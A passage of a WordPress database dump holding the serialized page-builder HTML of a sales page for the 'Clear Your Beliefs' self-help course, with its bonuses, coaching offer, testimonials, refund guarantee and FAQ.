class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, BeliefCloset.com, or ConfusedAboutLove.com.</p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1600, 2040, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly 